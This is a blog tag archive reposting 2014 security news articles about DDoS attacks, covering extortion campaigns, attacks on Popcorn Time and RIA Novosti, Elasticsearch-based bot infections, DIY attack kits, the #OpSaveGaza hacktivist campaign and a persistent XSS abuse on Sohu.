Tag Archives: ddos

DDoS extortion attacks on the rise

While digital ransom attacks come in various types and forms, Distributed Denial of Service (DDoS) attacks are top of the list of methods used by attackers to force money from targeted companies. So says Bryan Hamman, territory manager of Arbor Networks, who points out that in recent weeks, well-known names such as Evernote and Feedly have fallen victim to extortion attacks, but these companies are just the tip of the iceberg when it comes to this very lucrative criminal activity. InfoSecurity Magazine reports that this year the number of network time protocol amplification attacks increased 371.43%. The average peak DDoS attack volume increased a staggering 807.48%. The news aggregator Feedly said it had come under a DDoS attack from cyber criminals, which was preventing users from accessing its service. “Criminals are attacking Feedly with a distributed denial of service attack. The attacker is trying to extort money from us to make it stop. We refused to give in and are working with our network providers to mitigate the attack as best as we can,” said Feedly in a blog post. “‘Pay up or we’ll take your Web site down’, so goes the adage that usually accompanies ransom-based cyber-attacks,” says Hamman. According to Arbor’s ninth annual Worldwide Infrastructure Security Report, DDoS extortion attacks account for 15% of all DDoS attacks. While it may seem like a relatively small percentage, one must consider that as many as 10 000 DDoS attacks occur world-wide every day and the potential cost in damages and reputation can have a significant impact on a targeted organisation, Hamman points out. He explains that DDoS extortion attacks are generally volumetric, high bandwidth attacks launched with the aim of crashing a company’s Web site or server by bombarding it with packets, which originate from a large number of geographically distributed bots. The size of volumetric DDoS attacks continues to increase year on year, and they remain a major threat to enterprises and Internet service providers alike, he adds. “Traditionally, DDoS extortion attacks were used against online gambling sites, around major sporting events. Criminal gangs would initiate attacks that would bring the Web site down just before the event was to start, thus forcing the companies to choose between suffering a major loss in monetary and reputational terms or paying up. Increasingly, however, DDoS attacks are being used to extort money from all sorts of businesses and the reality is that no company should feel safe,” he says. So what is the right response when it comes to extortion demands? Hamman asks. “The answer is simple and always the same – not to give in. Organisations should under no circumstances agree to pay the ransom – it can set a dangerous precedent and encourage more attacks in the future; while it might make the pain go away in the short term, the long-term results are generally not worth it. “Declining to pay comes, of course, with severe consequences – as we saw from recent attacks on Feedly, who suffered from three separate waves of DDoS attacks. However, the company has now recovered from the attack and is operating as normal. Furthermore, it has been praised for its brave decision by the security community and even its own customers,” says Hamman. According to Hamman, many companies still rely on reactive measures such as router filters and firewalls, which are inefficient and not sophisticated enough to protect against organised cyber crime. Instead, he says, organisations need to invest in preventive, multi-layered mitigation, which includes on-premise and cloud protection, as well as allowing for co-operation with their ISP or hosting company. In addition, putting a mitigation strategy in place, should the worst happen, is of crucial importance – especially as only 17% of organisations globally feel they are fully prepared for a security incident. “By building defences, implementing plans ahead of time and refusing to give in, businesses needn’t feel threatened anymore – attackers wanting to make easy money will have to look elsewhere.” Source: http://www.itweb.co.za/index.php?option=com_content&view=article&id=136989:DDoS-extortion-attacks-on-the-rise&catid=265

See the original article here:
DDoS extortion attacks on the rise

Popcorn Time Hit By Massive DDoS Attack

A major fork of the popular Popcorn Time project is currently being subjected to a massive DDoS attack. The whole project has been hit, from the site hosting its source through to its CDN, API and DNS servers. The team tells TorrentFreak that the attack amounts to 10Gbps across their entire network. Every year sees periods when sites in the file-sharing sector are subjected to denial of service attacks. The attackers and their motives are often unknown and eventually the assaults pass away. Early in 2014 many torrent sites were hit, pushing some offline and forcing others to invest in mitigation technology. In May a torrent related host suffered similar problems. Today it’s the turn of the main open source Popcorn Time fork to face the wrath of attackers unknown. TorrentFreak spoke with members of the project including Ops manager XeonCore who told us that the attack is massive. “We are currently mitigating a large scale DDoS attack across our entire network. We are currently rerouting all traffic via some of our high bandwidth nodes and are working on imaging and getting our remaining servers back online to help deal with the load,” the team explain. The attack is project-wide with huge amounts of traffic hitting all parts of the network, starting with the site hosting the Popcorn Time source code. Attack on the source code site – 980Mbps Also under attack is the project’s CDN and API. The graph below shows one of the project’s servers located in France. The green shows the normal traffic from the API server, the blue represents the attack. Attack on the France API server – 931Mbps Not even the project’s DNS servers have remained untouched. At one point two of three DNS servers went down, with a third straining under almost 1Gbps of traffic. To be sure, a fourth DNS server was added to assist with the load. Attack on the Dutch DNS server – peaking at 880Mbps All told the whole network is being hit with almost 10Gbps of traffic, but the team is working hard to keep things operational. “We’ve added additional capacity. Our DNS servers are currently back up and running but there is still severe congestion around Europe and America. Almost 10Gbps across the entire network. Still working on mitigating. API is still online for most users!” they conclude. Nobody has yet claimed responsibility for the attack and it’s certainly possible things will remain that way. Only time will tell when the attack will subside, but the team are determined to keep their project online in the meantime. Source: http://torrentfreak.com/popcorn-time-hit-by-massive-ddos-attack-140814/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Torrentfreak+%28Torrentfreak%29

Read More:
Popcorn Time Hit By Massive DDoS Attack

RIA Novosti Website Hit by DDoS Attack

RIA Novosti’s website has fallen foul of a distributed denial-of-service (DDoS) attack by hackers, the agency’s IT specialists reported on Sunday. The mobile version of the website is currently inaccessible. Problems with the website’s full version were also reported for a short period of time. The agency’s terminal for clients has not been hampered. Unidentified hackers first attacked the website of InoSMI. When the attack was neutralized, they attempted to disrupt the work of RIA Novosti’s website. IT specialists are now working to eliminate the disruption that has caused by the attack. This is not the first cyber attack on the news agency. In May 2012, the RIA Novosti website was hit by a DDoS attack from some 2,500 IP-addresses. Another DDoS attack on the agency’s website was carried out in July 2013. Source: http://en.ria.ru/russia/20140803/191676816/RIA-Novosti-Website-Hit-by-Cyber-Attack.html

View the original here:
RIA Novosti Website Hit by DDoS Attack

Looking at insider threats from the outside

Cybersecurity is a never-ending battle requiring around-the-clock attention. From malware to DDoS to APT attacks, front-line IT security teams are being constantly bombarded. With all this attention o…

Read the original post:
Looking at insider threats from the outside

Attackers install DDoS bots on Amazon cloud, exploiting Elasticsearch weakness

Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers.   Elasticsearch is an increasingly popular open-source search engine server developed in Java that allows applications to perform full-text search for various types of documents through a REST API (representational state transfer application programming interface). Because it has a distributed architecture that allows for multiple nodes, Elasticsearch is commonly used in cloud environments. It can be deployed on Amazon Elastic Compute Cloud (EC2), Microsoft Azure, Google Compute Engine and other cloud platforms. Versions 1.1.x of Elasticsearch have support for active scripting through API calls in their default configuration. This feature poses a security risk because it doesn’t require authentication and the script code is not sandboxed. Security researchers reported earlier this year that attackers can exploit Elasticsearch’s scripting capability to execute arbitrary code on the underlying server, the issue being tracked as CVE-2014-3120 in the Common Vulnerabilities and Exposures (CVE) database. Elasticsearch’s developers haven’t released a patch for the 1.1.x branch, but starting with version 1.2.0, released on May 22, dynamic scripting is disabled by default. Last week security researchers from Kaspersky Lab found new variants of Mayday, a Trojan program for Linux that’s used to launch distributed denial-of-service (DDoS) attacks. The malware supports several DDoS techniques, including DNS amplification. One of the new Mayday variants was found running on compromised Amazon EC2 server instances, but this is not the only platform being misused, said Kaspersky Lab researcher Kurt Baumgartner Friday in a blog post. The attackers break into EC2 instances—virtual machines run by Amazon EC2 customers—by exploiting the CVE-2014-3120 vulnerability in Elasticsearch 1.1.x, which is still being used by some organizations in active commercial deployments despite being superseded by Elasticsearch 1.2.x and 1.3.x, Baumgartner said.   The Kaspersky researchers managed to observe the early stages of the Elasticsearch attacks on EC2. They said that the attackers modified publicly available proof-of-concept exploit code for CVE-2014-3120 and used it to install a Perl-based Web shell—a backdoor script that allows remote attackers to execute Linux shell commands over the Web. The script, detected by Kaspersky products as Backdoor.Perl.RShell.c, is then used to download the new version of the Mayday DDoS bot, detected as Backdoor.Linux.Mayday.g. The Mayday variant seen on compromised EC2 instances didn’t use DNS amplification and only flooded sites with UDP traffic. Nevertheless, the attacks forced targets, which included a large regional bank in the U.S. and a large electronics maker and service provider from Japan, to switch their IP (Internet Protocol) addresses to those of a DDoS mitigation provider, Baumgartner said. “The flow is also strong enough that Amazon is now notifying their customers, probably because of potential for unexpected accumulation of excessive resource charges for their customers,” he said. “The situation is probably similar at other cloud providers.” Users of Elasticsearch 1.1.x should upgrade to a newer version and those who require the scripting functionality should follow the security recommendations made by the software’s developers in a blog post on July 9. Source: http://www.networkworld.com/article/2458741/attackers-install-ddos-bots-on-amazon-cloud-exploiting-elasticsearch-weakness.html#tk.rss_all

Continue Reading:
Attackers install DDoS bots on Amazon cloud, exploiting Elasticsearch weakness

DDoS attacks grow as first DIY kits emerge

Alongside the report, Trustwave is reporting the discovery of DIY DDoS kits for sale from just US$ 200 (£118) and which give users – apart from a high bandwidth connection – all they need to stage a wide-scale attack. The analysis – from Prolexic Technologies, now part of Akamai – claims to show that distributed denial of service activity has surged by 22 percent over the last quarter, putting levels close to those seen in Q1 of this year, when existing DDoS volume and allied records were broken. Delving into the report reveals there was a 72 percent increase in the average bandwidth of attacks during the second quarter, along with a shift to reflection-based attacks that undermine common web protocols, as well as the arrival of server-side botnets that exploit web vulnerabilities in Windows and Linux-based systems. The analysis concludes that there have been shifts in the industry targets compared with last quarter’s DDOS activity. The difference in these numbers, says the report, may be due to the different types of malicious actors on the Internet that may be active at any particular time. “It is clear that the majority of malicious actors preferred to use of volumetric attacks in Q2 – this trend was seen across all verticals. A significant variant in attack vectors by industry was the use of a very sophisticated botnets against financial and media sites,” notes the report, adding that these attacks do not seem to fit the previous patterns and motives of the DDoS criminal ecosystem. According to Trustwave, meanwhile, its research has revealed that hackers are now selling the Neutrino Bot malware kit, which it can be used to infect a large number of computers, create a botnet, and launch DDoS attacks against websites and services at will. For US$ 500 (£294), meanwhile, hackers will sell all comers BetaBot 1.6, which Trustwave says is a remote access Trojan that can run DDoS attacks, and steal sensitive data, passwords and files from infected systems. Karl Sigler, Trustwave’s threat intelligence manager, said he was unsurprised by the findings. “Supply and demand affects malware markets like they do any market. Even though demand is high, there is an increasing amount of malware competing with each other and this helps drive down the cost. There is also a cost-benefit issue. Criminals look at how much they can make by selling stolen data acquired using the malware. Finally, age plays a role. The longer malware is on the market, the cheaper it tends to get,” he said. Rob Bamforth, a principal analyst with Quocirca, the business analysis and research house, said that the surge in volumes and incidences of DDoS attacks in the second quarter identified by Akamai suggests a larger number of servers being infected by cyber-criminals – coupled with the fact that that many systems `out there’ are Windows XP-based, which has become a legacy operating system since it reached end-of-life with Microsoft back in April. “It also suggests there is a degree of complacency in the business sector, with many managers saying they do not want to invest extra money in IT security, as they do not see a return. Many businesses are suffering an ongoing squeeze on costs, so a failure to invest in security is understandable, even if it is not the correct approach to take,” he told SCMagazineUK.com . Nick Mazitelli, a senior consultant with Context Information Security, meanwhile, said that Akamai’s analysis that the widespread dissemination of increasingly capable attacker toolsets is a trend we see right across the threat landscape, from cyber-crime through to state-sponsored attacks and everything in between. “On the one hand this trend is fuelled by the on-going professionalisation and commoditisation of criminal marketplaces, and on the other by increasing levels of interconnection between threat groups of all stripes. Not only does this mean that existing threat groups have access to improved capability, but it also lowers the barrier of entry for newcomers thereby increasing the number of malicious parties active in the landscape – both factors that unavoidably increase the tempo of what is effectively an arms race between attacker and defender,” he said. “With this increased tempo as background it is important to highlight the necessity of a flexible and adaptable approach to security based on a sound understanding of the threat landscape. In particular those aspects of security concerned with network security monitoring as well as incident response are areas that have often been overlooked in the past, but are critical components of effectively managing the risk and minimising the potential impact of these constantly evolving threats,” he added. Source: http://www.scmagazineuk.com/ddos-attacks-grow-as-first-diy-kits-emerge/article/362573/

Excerpt from:
DDoS attacks grow as first DIY kits emerge

Image akincilar-graphic-message-protesting-against-treatment-palestinians-has-replaced-homepage.jpg

#OpSaveGaza: Anonymous Takes Down 1,000 Israeli Government and Business Websites

Hacker collective Anonymous has announced that it has taken down over a thousand of crucial Israeli websites in a huge new coordinated cyber-attack called #OpSaveGaza on 11 July and 17 July, in support of the people of Palestine. Some of the websites, such as the Tel Aviv Police Department’s online presence, are still offline two days after the distributed denial of service (DDoS) attacks, and numerous Israeli government homepages have been replaced by graphics, slogans, and auto-playing audio files made by AnonGhost, the team of hackers who coordinated the attack. The official Israeli government jobs website has had its homepage replaced by a graphic titled “Akincilar”, which is Turkish for the Ottoman Empire’s troops. Akincilar: A graphic and message protesting against the treatment of Palestinians is still replacing the homepage of certain Israeli government websites A message written in English and Turkish – presumably by Turkish hackers – and accompanied by pictures of Palestinians suffering says: “The Jerusalem cause is Muslims’ fight of honour” and says that people who fight for Palestine are “on the side of Allah”. Another Israeli government website now bears an AnonGhost graphic and lists the usernames of 38 hackers. An audio file that auto-plays when the page loads plays music and a synthesized newsreader clip, together with a message beseeching human rights organisations, hackers and activists to attack Israeli websites to become the “cyber shield, the voice for the forgotten people”. AnonGhost’s #OpSaveGaza message has been displayed on many Israeli websites Many of the websites have since been restored. The hackers have also leaked lists of Israeli government email addresses obtained by hacking websites of the Ministry of Immigrant Absorption, the Ministry of Justice, the Ministry of Culture and Sport, the Ministry of Housing and Construction and much more. Israeli websites belonging to restaurants, local businesses, associations, societies, academic foundations and even a symphony orchestra were also attacked, as well as a subdomain belonging to MSN Israel. A message on the main Pastebin page and some of the hacked websites reads : “The act of launching rockets from Gaza sector to Israhell is an acceptable and normal reaction against those pigs, it’s called Resistance and not terrorism. “Israhell never existed its only Palestine, it’s our home. If you are a Hacker, Activist, a Human Right Organisation then hack israel websites and expose to the world their crimes, show to the world how much blood is on their hands, blood of innocent children and women.” Anonymous has previously run another campaign in April targeting Israeli websites, although on a smaller scale. About 500 websites went offline during the OpIsrael campaign and the hackers released the phone numbers and email addresses of some Israeli officials. Source: http://www.ibtimes.co.uk/opsavegaza-anonymous-takes-down-1000-israeli-government-business-websites-1457269

View article:
#OpSaveGaza: Anonymous Takes Down 1,000 Israeli Government and Business Websites

“Chinese YouTube” Used as DDoS attack Machine

Even the biggest websites in the world are vulnerable to DDoS. Want proof? Well, all throughout this past April, a hacker took advantage of a hole in Sohu.com’s security to launch Persistent Cross-Site Swapping (XSS) attacks against various targets across the globe. Sohu.com, in case you don’t know, is one of the largest websites in the world – in fact 24th largest, according to Alexa Top 100 Ranking. But, for all its size and multi-billion dollar net worth, Sohu could be exploited by hackers who managed to convert its popularity into a massive Persistent XSS enabled DDoS attack. Devastating New DDoS Attack Method At its basis, Persistent XSS is a crafty type of malicious code injection. This injection method involves convincing a server to save data from an outside source (the hacker) and then refresh the data every time a new browser accesses the page. In this attack, the hacker saved to Sohu’s server a JS script that runs a DDoS tool. To do this, he placed a malicious JS script within the avatar image of a fabricated user profile. As with most video sites, this infected user picture would then show up next to any comments wrote by this profile, on Sohu’s video pages. The hacker was smart enough to write a JS script that would hijack every new browser that accessed a video page with the infected comment, forcing it to run a sent DDoS to the target site. The hacker programmed the script to send GET requests to the target once a second. Imagine; thousands of users watching a video on Sohu sending malicious GET requests every second. These bad requests add up quickly, quickly growing to millions every minute. Interestingly enough, the hacker also had the brains to put his infected comment on the most popular and longest playing videos, so the viewers would rack up DDoS requests even faster. This large security event goes to show that even powerful websites can be manipulated by hackers. Where Will the Next Attack Come From? It’s difficult to say. This case study shows that hackers will use whatever means necessary to take down their targets. Without 3rd party protection services, most websites can only defend what they’ve seen already–they can only react after they have been hit. In this instance, the hacker was clever enough to fly under the radar and avoid detection by Sohu’s watchful IT team. If the hacker had chosen a target without a DDoS protection service, Sohu might still be a giant DDoS machine causing havoc on innocent websites. Source: http://www.economicvoice.com/chinese-youtube-used-as-ddos-machine/  

Continue Reading:
“Chinese YouTube” Used as DDoS attack Machine

Botnets gain 18 infected systems per second

“According to industry estimates, botnets have caused over $9 billion in losses to US victims and over $110 billion in losses globally. Approximately 500 million computers are infected globally each y…

More:
Botnets gain 18 infected systems per second